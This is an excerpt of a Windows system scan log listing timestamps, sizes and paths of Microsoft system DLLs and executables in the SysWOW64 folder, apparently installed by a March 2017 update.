        2017-03-15 09:42 - 2017-03-04 13:27 - 00141824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.Radios.dll
        2017-03-15 09:42 - 2017-03-04 13:27 - 00055296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\findnetprinters.dll
        2017-03-15 09:42 - 2017-03-04 13:27 - 00045056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ddrawex.dll
        2017-03-15 09:42 - 2017-03-04 13:26 - 00177664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Web.Diagnostics.dll
        2017-03-15 09:42 - 2017-03-04 13:26 - 00156672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UserDeviceRegistration.dll
        2017-03-15 09:42 - 2017-03-04 13:26 - 00156672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\BcastDVRHelper.dll
        2017-03-15 09:42 - 2017-03-04 13:26 - 00147456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VCardParser.dll
        2017-03-15 09:42 - 2017-03-04 13:26 - 00138240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DisplayManager.dll
        2017-03-15 09:42 - 2017-03-04 13:26 - 00123904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Networking.HostName.dl l
        2017-03-15 09:42 - 2017-03-04 13:26 - 00065024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Gaming.UI.GameBar.dll
        2017-03-15 09:42 - 2017-03-04 13:26 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Shell.Search.UriHandle r.dll
        2017-03-15 09:42 - 2017-03-04 13:26 - 00038912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wfdprov.dll
        2017-03-15 09:42 - 2017-03-04 13:26 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\netiougc.exe
        2017-03-15 09:42 - 2017-03-04 13:25 - 00255488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\unimdm.tsp
        2017-03-15 09:42 - 2017-03-04 13:25 - 00251904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscandui.dll
        2017-03-15 09:42 - 2017-03-04 13:25 - 00175104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\puiapi.dll
        2017-03-15 09:42 - 2017-03-04 13:25 - 00152064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MCCSEngineShared.dll
        2017-03-15 09:42 - 2017-03-04 13:25 - 00136192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WinRtTracing.dll
        2017-03-15 09:42 - 2017-03-04 13:25 - 00128000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\BrowserSettingSync.dll
        2017-03-15 09:42 - 2017-03-04 13:25 - 00097792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.System.SystemManagemen t.dll
        2017-03-15 09:42 - 2017-03-04 13:25 - 00030208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tbauth.dll
        2017-03-15 09:42 - 2017-03-04 13:24 - 00328192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\daxexec.dll
        2017-03-15 09:42 - 2017-03-04 13:24 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\scksp.dll
        2017-03-15 09:42 - 2017-03-04 13:24 - 00142336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.WiFi.dll
        2017-03-15 09:42 - 2017-03-04 13:24 - 00129024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.SerialCommunic ation.dll
        2017-03-15 09:42 - 2017-03-04 13:24 - 00093184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msctfui.dll
        2017-03-15 09:42 - 2017-03-04 13:24 - 00088576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UserDeviceRegistration.Ngc.dll
        2017-03-15 09:42 - 2017-03-04 13:24 - 00087040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Networking.ServiceDisc overy.Dnssd.dll
        2017-03-15 09:42 - 2017-03-04 13:24 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TokenBrokerCookies.exe
        2017-03-15 09:42 - 2017-03-04 13:23 - 00531456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iprtrmgr.dll
        2017-03-15 09:42 - 2017-03-04 13:23 - 00506368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\bcastdvr.exe
        2017-03-15 09:42 - 2017-03-04 13:23 - 00392192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Gaming.Input.dll
        2017-03-15 09:42 - 2017-03-04 13:23 - 00374784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.LowLevel.dll
        2017-03-15 09:42 - 2017-03-04 13:23 - 00334848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DavSyncProvider.dll
        2017-03-15 09:42 - 2017-03-04 13:23 - 00315904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Gaming.XboxLive.Storag e.dll
        2017-03-15 09:42 - 2017-03-04 13:23 - 00299520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UserDataAccountApis.dll
        2017-03-15 09:42 - 2017-03-04 13:23 - 00291840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Search.ProtocolHandler.MAPI2.d ll
        2017-03-15 09:42 - 2017-03-04 13:23 - 00231936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.ApplicationModel.LockS creen.dll
        2017-03-15 09:42 - 2017-03-04 13:23 - 00184320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UserMgrProxy.dll
        2017-03-15 09:42 - 2017-03-04 13:23 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\netiohlp.dll
        2017-03-15 09:42 - 2017-03-04 13:22 - 01299968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSVPXENC.dll
        2017-03-15 09:42 - 2017-03-04 13:22 - 00332288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MapConfiguration.dll
        2017-03-15 09:42 - 2017-03-04 13:22 - 00265728 _____ C:\Windows\SysWOW64\Windows.Perception.Stub.dll
        2017-03-15 09:42 - 2017-03-04 13:22 - 00237568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SyncSettings.dll
        2017-03-15 09:42 - 2017-03-04 13:22 - 00230912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\icm32.dll
        2017-03-15 09:42 - 2017-03-04 13:22 - 00212992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cemapi.dll
        2017-03-15 09:42 - 2017-03-04 13:22 - 00183296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchFilterHost.exe
        2017-03-15 09:42 - 2017-03-04 13:22 - 00117760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AuthBroker.dll
        2017-03-15 09:42 - 2017-03-04 13:22 - 00092160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DafPrintProvider.dll
        2017-03-15 09:42 - 2017-03-04 13:21 - 01243136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.FaceAnalysis.dll
        2017-03-15 09:42 - 2017-03-04 13:21 - 00670208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.PointOfService .dll
        2017-03-15 09:42 - 2017-03-04 13:21 - 00631296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\main.cpl
        2017-03-15 09:42 - 2017-03-04 13:21 - 00609280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.Import.dll
        2017-03-15 09:42 - 2017-03-04 13:21 - 00575488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\nshwfp.dll
        2017-03-15 09:42 - 2017-03-04 13:21 - 00483840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.AllJoyn.dll
        2017-03-15 09:42 - 2017-03-04 13:21 - 00389632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
        2017-03-15 09:42 - 2017-03-04 13:21 - 00298496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Internal.Management.dl l
        2017-03-15 09:42 - 2017-03-04 13:21 - 00202752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.HumanInterface Device.dll
        2017-03-15 09:42 - 2017-03-04 13:21 - 00196608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tapi32.dll
        2017-03-15 09:42 - 2017-03-04 13:21 - 00185856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Security.Authenticatio n.Identity.Provider.dll
        2017-03-15 09:42 - 2017-03-04 13:20 - 00632832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sud.dll
        2017-03-15 09:42 - 2017-03-04 13:20 - 00562176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.SmartCards.dll
        2017-03-15 09:42 - 2017-03-04 13:20 - 00534528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PCPTpm12.dll
        2017-03-15 09:42 - 2017-03-04 13:20 - 00506880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DevicePairing.dll
        2017-03-15 09:42 - 2017-03-04 13:20 - 00426496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.ApplicationModel.Walle t.dll
        2017-03-15 09:42 - 2017-03-04 13:20 - 00426496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\OneDriveSettingSyncProvider.dl l
        2017-03-15 09:42 - 2017-03-04 13:20 - 00424960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msutb.dll
        2017-03-15 09:42 - 2017-03-04 13:20 - 00386048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.WiFiDirect.dll
        2017-03-15 09:42 - 2017-03-04 13:20 - 00368128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wlanui.dll
        2017-03-15 09:42 - 2017-03-04 13:20 - 00325120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleacc.dll
        2017-03-15 09:42 - 2017-03-04 13:20 - 00284672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apprepsync.dll
        2017-03-15 09:42 - 2017-03-04 13:20 - 00271360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\deviceaccess.dll
        2017-03-15 09:42 - 2017-03-04 13:20 - 00218624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WwaApi.dll
        2017-03-15 09:42 - 2017-03-04 13:20 - 00206336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vaultcli.dll
        2017-03-15 09:42 - 2017-03-04 13:20 - 00175616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.Scanners.dll
        2017-03-15 09:42 - 2017-03-04 13:20 - 00125952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apprepapi.dll
        2017-03-15 09:42 - 2017-03-04 13:19 - 00714752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssvp.dll
        2017-03-15 09:42 - 2017-03-04 13:19 - 00498688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mbsmsapi.dll
        2017-03-15 09:42 - 2017-03-04 13:19 - 00431616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\efswrt.dll
        2017-03-15 09:42 - 2017-03-04 13:19 - 00414208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winspool.drv
        2017-03-15 09:42 - 2017-03-04 13:19 - 00390656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CredProvDataModel.dll
        2017-03-15 09:42 - 2017-03-04 13:19 - 00318464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchFolder.dll
        2017-03-15 09:42 - 2017-03-04 13:19 - 00262144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.Picker.dll
        2017-03-15 09:42 - 2017-03-04 13:19 - 00226816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dhcpcore6.dll
        2017-03-15 09:42 - 2017-03-04 13:19 - 00181760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tcpipcfg.dll
        2017-03-15 09:42 - 2017-03-04 13:18 - 01231360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wcnwiz.dll
        2017-03-15 09:42 - 2017-03-04 13:18 - 00896512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fontext.dll
        2017-03-15 09:42 - 2017-03-04 13:18 - 00747520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.Ocr.dll
        2017-03-15 09:42 - 2017-03-04 13:18 - 00567808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ChatApis.dll
        2017-03-15 09:42 - 2017-03-04 13:18 - 00548352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ddraw.dll
        2017-03-15 09:42 - 2017-03-04 13:18 - 00525824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PrintDialogs.dll
        2017-03-15 09:42 - 2017-03-04 13:18 - 00314368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.Usb.dll
        2017-03-15 09:42 - 2017-03-04 13:18 - 00284672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.ApplicationModel.dll
        2017-03-15 09:42 - 2017-03-04 13:18 - 00254464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssphtb.dll
        2017-03-15 09:42 - 2017-03-04 13:18 - 00253952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.ApplicationModel.Store .TestingFramework.dll
        2017-03-15 09:42 - 2017-03-04 13:18 - 00140800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssph.dll
        2017-03-15 09:42 - 2017-03-04 13:18 - 00074752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\updatepolicy.dll
        2017-03-15 09:42 - 2017-03-04 13:17 - 00529920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\StructuredQuery.dll
        2017-03-15 09:42 - 2017-03-04 13:17 - 00297472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchProtocolHost.exe
        2017-03-15 09:42 - 2017-03-04 13:17 - 00238080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AboveLockAppHost.dll
        2017-03-15 09:42 - 2017-03-04 13:16 - 01456640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\GdiPlus.dll
        2017-03-15 09:42 - 2017-03-04 13:16 - 00968704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Unistore.dll
        2017-03-15 09:42 - 2017-03-04 13:16 - 00858112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\EmailApis.dll
        2017-03-15 09:42 - 2017-03-04 13:16 - 00850432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rasgcw.dll
        2017-03-15 09:42 - 2017-03-04 13:16 - 00816640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\NaturalLanguage6.dll
        2017-03-15 09:42 - 2017-03-04 13:16 - 00762880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mprddm.dll
        2017-03-15 09:42 - 2017-03-04 13:16 - 00760832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appwiz.cpl
        2017-03-15 09:42 - 2017-03-04 13:16 - 00711680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapi.dll
        2017-03-15 09:42 - 2017-03-04 13:16 - 00636928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winhttp.dll
        2017-03-15 09:42 - 2017-03-04 13:16 - 00584192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Security.Authenticatio n.Web.Core.dll
        2017-03-15 09:42 - 2017-03-04 13:16 - 00526336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscms.dll
        2017-03-15 09:42 - 2017-03-04 13:16 - 00500224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Graphics.Printing.dll
        2017-03-15 09:42 - 2017-03-04 13:16 - 00465920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\LockAppBroker.dll
        2017-03-15 09:42 - 2017-03-04 13:16 - 00368128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\puiobj.dll
        2017-03-15 09:42 - 2017-03-04 13:16 - 00288256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CryptoWinRT.dll
        2017-03-15 09:42 - 2017-03-04 13:15 - 01543680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mmc.exe
        2017-03-15 09:42 - 2017-03-04 13:15 - 00509440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
        2017-03-15 09:42 - 2017-03-04 13:15 - 00336384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\azroleui.dll
        2017-03-15 09:42 - 2017-03-04 13:15 - 00313856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppXDeploymentClient.dll
        2017-03-15 09:42 - 2017-03-04 13:14 - 01534464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Graphics.Printing.3D.d ll
        2017-03-15 09:42 - 2017-03-04 13:14 - 00236032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmWmiPl.dll
        2017-03-15 09:42 - 2017-03-04 13:13 - 06474752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mspaint.exe
        2017-03-15 09:42 - 2017-03-04 13:13 - 04613120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.dll
        2017-03-15 09:42 - 2017-03-04 13:13 - 03733504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_47.dll
        2017-03-15 09:42 - 2017-03-04 13:13 - 02458112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\themecpl.dll
        2017-03-15 09:42 - 2017-03-04 13:13 - 01228288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\usercpl.dll
        2017-03-15 09:42 - 2017-03-04 13:13 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppointmentApis.dll
        2017-03-15 09:42 - 2017-03-04 13:13 - 00675840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Networking.dll
        2017-03-15 09:42 - 2017-03-04 13:13 - 00653312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.AccountsControl.dll
        2017-03-15 09:42 - 2017-03-04 13:13 - 00497152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\LogonController.dll
        2017-03-15 09:42 - 2017-03-04 13:13 - 00256512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\thumbcache.dll
        2017-03-15 09:42 - 2017-03-04 13:12 - 00901120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.Bluetooth.dll
        2017-03-15 09:42 - 2017-03-04 13:12 - 00886272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aadtb.dll
        2017-03-15 09:42 - 2017-03-04 13:12 - 00884224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll
        2017-03-15 09:42 - 2017-03-04 13:12 - 00700416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Storage.Search.dll
        2017-03-15 09:42 - 2017-03-04 13:12 - 00589312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.Sensors.dll
        2017-03-15 09:42 - 2017-03-04 13:12 - 00395264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dmenrollengine.dll
        2017-03-15 09:42 - 2017-03-04 13:11 - 01357312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSPhotography.dll
        2017-03-15 09:42 - 2017-03-04 13:11 - 01320448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\comsvcs.dll
        2017-03-15 09:42 - 2017-03-04 13:11 - 00355328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\RTMediaFrame.dll
        2017-03-15 09:42 - 2017-03-04 13:10 - 01077760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.Editing.dll
        2017-03-15 09:42 - 2017-03-04 13:10 - 00471552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.BackgroundMediaP layback.dll
        2017-03-15 09:42 - 2017-03-04 13:10 - 00300544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\regedit.exe
        2017-03-15 09:42 - 2017-03-04 13:10 - 00259584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msdtcuiu.dll
        2017-03-15 09:42 - 2017-03-04 13:09 - 00795648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MiracastReceiver.dll
        2017-03-15 09:42 - 2017-03-04 13:09 - 00570368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\clusapi.dll
        2017-03-15 09:42 - 2017-03-04 13:09 - 00343040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PlayToDevice.dll
        2017-03-15 09:42 - 2017-03-04 13:09 - 00123904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ProximityCommon.dll
        2017-03-15 09:42 - 2017-03-04 13:08 - 00713216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wpnapps.dll
        2017-03-15 09:42 - 2017-03-04 13:07 - 01255936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AzureSettingSyncProvider.dll
        2017-03-15 09:42 - 2017-03-04 13:07 - 00895488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.Streaming.dll
        2017-03-15 09:42 - 2017-03-04 13:07 - 00545280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfmkvsrcsnk.dll
        2017-03-15 09:42 - 2017-03-04 13:06 - 03198464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cdp.dll
        2017-03-15 09:42 - 2017-03-04 13:06 - 00220672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PlayToReceiver.dll
        2017-03-15 09:42 - 2017-03-04 13:06 - 00090624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\olepro32.dll
        2017-03-15 09:42 - 2017-03-04 13:05 - 07468544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
        2017-03-15 09:42 - 2017-03-04 13:05 - 01221120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.Audio.dll
        2017-03-15 09:42 - 2017-03-04 13:05 - 01133568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vssapi.dll
        2017-03-15 09:42 - 2017-03-04 13:05 - 00545792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\uReFS.dll
        2017-03-15 09:42 - 2017-03-04 13:05 - 00458752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wlidprov.dll
        2017-03-15 09:42 - 2017-03-04 13:05 - 00298496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\resutils.dll
        2017-03-15 09:42 - 2017-03-04 13:05 - 00134144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ErrorDetails.dll
        2017-03-15 09:42 - 2017-03-04 13:05 - 00089600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CameraCaptureUI.dll
        2017-03-15 09:42 - 2017-03-04 13:04 - 00753152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\imapi2fs.dll
        2017-03-15 09:42 - 2017-03-04 13:04 - 00719872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wsp_sr.dll
        2017-03-15 09:42 - 2017-03-04 13:04 - 00640000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MCRecvSrc.dll
        2017-03-15 09:42 - 2017-03-04 13:03 - 01247232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Globalization.dll
        2017-03-15 09:42 - 2017-03-04 13:03 - 00409600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVSENCD.DLL
        2017-03-15 09:42 - 2017-03-04 13:03 - 00400384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PlayToManager.dll
        2017-03-15 09:42 - 2017-03-04 13:03 - 00359936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mtxclu.dll
        2017-03-15 09:42 - 2017-03-04 13:02 - 02740224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msftedit.dll
        2017-03-15 09:42 - 2017-03-04 13:02 - 02484736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gameux.dll
        2017-03-15 09:42 - 2017-03-04 13:02 - 02138112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\InputService.dll
        2017-03-15 09:42 - 2017-03-04 13:02 - 01709056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ActiveSyncProvider.dll
        2017-03-15 09:42 - 2017-03-04 13:02 - 01170944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.Speech.dll
        2017-03-15 09:42 - 2017-03-04 13:02 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSVP9DEC.dll
        2017-03-15 09:42 - 2017-03-04 13:02 - 01004544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Input.Inking.dll
        2017-03-15 09:42 - 2017-03-04 13:02 - 00580608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\hgcpl.dll
        2017-03-15 09:42 - 2017-03-04 13:01 - 02682880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\netshell.dll
        2017-03-15 09:42 - 2017-03-04 13:01 - 01656320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.Perception.dll
        2017-03-15 09:42 - 2017-03-04 13:01 - 01571840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3.dll
        2017-03-15 09:42 - 2017-03-04 13:01 - 01564160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
        2017-03-15 09:42 - 2017-03-04 13:01 - 01293312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMPDMC.exe
        2017-03-15 09:42 - 2017-03-04 13:01 - 01232384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Xaml.Maps.dll
        2017-03-15 09:42 - 2017-03-04 13:01 - 01154560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Pimstore.dll
        2017-03-15 09:42 - 2017-03-04 13:01 - 01013248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Web.Http.dll
        2017-03-15 09:42 - 2017-03-04 13:01 - 00827904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\twinui.appcore.dll
        2017-03-15 09:42 - 2017-03-04 13:01 - 00773120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchIndexer.exe
        2017-03-15 09:42 - 2017-03-04 13:01 - 00620544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.dll
        2017-03-15 09:42 - 2017-03-04 13:01 - 00566784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ShareHost.dll
        2017-03-15 09:42 - 2017-03-04 13:01 - 00560640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UserLanguagesCpl.dll
        2017-03-15 09:42 - 2017-03-04 13:01 - 00422400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\twinapi.dll
        2017-03-15 09:42 - 2017-03-04 13:00 - 02996736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\win32kfull.sys
        2017-03-15 09:42 - 2017-03-04 13:00 - 01883648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Logon.dll
        2017-03-15 09:42 - 2017-03-04 13:00 - 01170944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Xaml.Phone.dll
        2017-03-15 09:42 - 2017-03-04 13:00 - 00862208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SettingSyncCore.dll
        2017-03-15 09:42 - 2017-03-04 13:00 - 00850944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ContactApis.dll
        2017-03-15 09:42 - 2017-03-04 13:00 - 00798208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authui.dll
        2017-03-15 09:42 - 2017-03-04 13:00 - 00751104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Networking.BackgroundT ransfer.dll
        2017-03-15 09:42 - 2017-03-04 13:00 - 00711680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Search.dll
        2017-03-15 09:42 - 2017-03-04 13:00 - 00691200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TokenBroker.dll
        2017-03-15 09:42 - 2017-03-04 13:00 - 00654336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MbaeApiPublic.dll
        2017-03-15 09:42 - 2017-03-04 13:00 - 00598528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Web.dll
        2017-03-15 09:42 - 2017-03-04 13:00 - 00444416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SettingSync.dll
        2017-03-15 09:42 - 2017-03-04 13:00 - 00348160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.Midi.dll
        2017-03-15 09:42 - 2017-03-04 12:59 - 00353280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TextInputFramework.dll
        2017-03-15 09:42 - 2017-03-04 12:59 - 00206848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Core.TextInput.dll
        2017-03-15 09:42 - 2017-03-04 12:57 - 03106304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe
        2017-03-15 09:42 - 2017-03-04 12:57 - 00783360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSWorkspace.dll
        2017-03-15 09:42 - 2017-03-04 12:57 - 00449024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TpmCoreProvisioning.dll
        2017-03-15 09:42 - 2017-03-04 12:57 - 00299008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\RADCUI.dll
